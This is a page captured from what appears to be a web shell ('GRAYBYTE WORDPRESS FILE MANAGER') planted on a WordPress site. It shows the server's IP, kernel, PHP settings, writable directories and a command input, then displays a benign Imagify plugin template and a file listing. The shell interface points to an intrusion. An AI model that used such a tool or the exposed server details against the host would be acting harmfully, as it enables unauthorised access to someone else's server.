GRAYBYTE WORDPRESS FILE MANAGER6801

Server IP : 198.54.121.189 / Your IP : 216.73.216.112
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /home/giriqfky/swamivivekananda.co.in/wp-content/plugins/imagify/views/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/giriqfky/swamivivekananda.co.in/wp-content/plugins/imagify/views//part-settings-library.php
<?php
defined( 'ABSPATH' ) || exit;

$settings    = Imagify_Settings::get_instance();
$options     = Imagify_Options::get_instance();
$option_name = $options->get_option_name();
?>
	<div class="imagify-media-lib-section">
		<div class="<?php echo imagify_can_optimize_custom_folders() ? 'imagify-col' : ''; ?>">
			<h3 class="imagify-options-subtitle"><?php esc_html_e( 'Media Library', 'imagify' ); ?></h3>

			<p class="imagify-setting-line">
				<?php
				$settings->field_checkbox(
					[
						'option_name' => 'resize_larger',
						'label'       => __( 'Resize larger images', 'imagify' ),
						'attributes'  => [
							'aria-describedby' => 'describe-resize_larger',
						],
					]
				);
				?>

				<span class="imagify-options-line">
			<label for="imagify_resize_larger_w">
			<?php
			$max_sizes       = get_imagify_max_intermediate_image_size();
			$resize_larger_w = $options->get( 'resize_larger_w' );
			printf(
			/* translators: 1 is a text input for a number of pixels (don't use %d). */
				esc_html__( 'to maximum %s pixels width', 'imagify' ),
				'<input type="number" id="imagify_resize_larger_w" min="' . $max_sizes['width'] . '" name="' . $option_name . '[resize_larger_w]" value="' . ( $resize_larger_w ? $resize_larger_w : '' ) . '" size="5">'
			);
			?>
			</label>
		</span>

				<span id="describe-resize_larger" class="imagify-info">
			<span class="dashicons dashicons-info"></span>
					<?php
					printf(
					/* translators: 1 is a number of pixels. */
						esc_html__( 'This option is recommended to reduce larger images. You can save up to 80%% after resizing. The new width should not be less than your largest thumbnail width, which is actually %dpx.', 'imagify' ),
						$max_sizes['width']
					);
					echo ' ';

					if ( function_exists( 'wp_get_original_image_path' ) ) {
						// WP 5.3+.
						echo '<strong>' . esc_html__( 'Resizing is done on upload or during optimization.', 'imagify' ) . '</strong>';
					} else {
						esc_html_e( 'Resizing is done only during optimization.', 'imagify' );
					}
					?>
		</span>
			</p>

			<?php if ( ! imagify_is_active_for_network() ) : ?>

				<div class="imagify-divider"></div>

				<h4 class="imagify-h4-like"><?php esc_html_e( 'Files optimization', 'imagify' ); ?></h4>

				<p>
					<?php esc_html_e( 'You can choose to optimize different image sizes created by WordPress here.', 'imagify' ); ?>
				</p>

				<p>
					<?php
					printf(
					/* translators: 1 is a "bold" tag start, 2 is the "bold" tag end. */
						esc_html__( 'The %1$soriginal size%2$s is %1$sautomatically optimized%2$s by Imagify.', 'imagify' ),
						'<strong>',
						'</strong>'
					);
					?>
					<br>
					<span class="imagify-success">
				<?php esc_html_e( 'Remember each additional image size will affect your Imagify monthly usage!', 'imagify' ); ?>
			</span>
				</p>

				<?php
				/**
				 * Disallowed thumbnail sizes.
				 */
				$settings->field_checkbox_list(
					[
						'option_name'   => 'disallowed-sizes',
						'legend'        => __( 'Choose the sizes to optimize', 'imagify' ),
						'values'        => Imagify_Settings::get_thumbnail_sizes(),
						'reverse_check' => true,
					]
				);
				?>

			<?php endif; ?>
		</div>
	</div>
<?php

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
July 10 2025 04:32:29
giriqfky / giriqfky
0755
admin
--
July 10 2025 04:32:29
giriqfky / giriqfky
0755
button
--
July 10 2025 04:32:29
giriqfky / giriqfky
0755
container
--
July 10 2025 04:32:29
giriqfky / giriqfky
0755
input
--
July 10 2025 04:32:29
giriqfky / giriqfky
0755
.htaccess
0.41 KB
July 10 2025 04:32:29
giriqfky / giriqfky
0644
modal-payment.php
7.165 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
modal-settings-infos.php
2.065 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
modal-settings-partners-infos.php
0.603 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
modal-settings-visual-comparison.php
5.678 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
notice-backup-folder-not-writable.php
0.754 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
notice-bulk-optimization-complete.php
1.157 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
notice-bulk-optimization-running.php
0.573 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
notice-footer.php
0.437 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
notice-grid-view.php
0.444 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
notice-header.php
0.561 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
notice-http-block-external.php
0.832 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
notice-plugins-to-deactivate.php
0.952 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
notice-rating.php
1.104 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
notice-temporary.php
0.542 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
notice-welcome-steps.php
2.994 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
notice-wp-rocket.php
0.97 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
notice-wrong-api-key.php
0.79 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
page-bulk.php
6.431 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
page-files-list.php
0.432 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
page-settings.php
8.226 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
part-bulk-optimization-header.php
1.497 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
part-bulk-optimization-infos.php
4.59 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
part-bulk-optimization-newbie.php
0.79 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
part-bulk-optimization-overquota-alert.php
1.203 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
part-bulk-optimization-success.php
1.882 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
part-bulk-optimization-table-row-folder-type.php
3.075 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
part-bulk-optimization-table.php
3.592 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
part-discount-banner.php
0.658 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
part-documentation-link.php
1.729 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
part-files-list-header.php
0.141 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
part-rocket-ad.php
2.097 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
part-settings-account.php
2.859 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
part-settings-custom-folders.php
7.039 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
part-settings-files-tree-row.php
2.828 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
part-settings-footer.php
0.655 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
part-settings-header.php
5.911 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
part-settings-library.php
3.168 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
part-settings-row-custom-folder.php
0.582 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
part-settings-webp-missing-message.php
0.404 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
part-settings-webp.php
6.89 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644
part-upsell.php
4.486 KB
June 23 2025 07:12:37
giriqfky / giriqfky
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF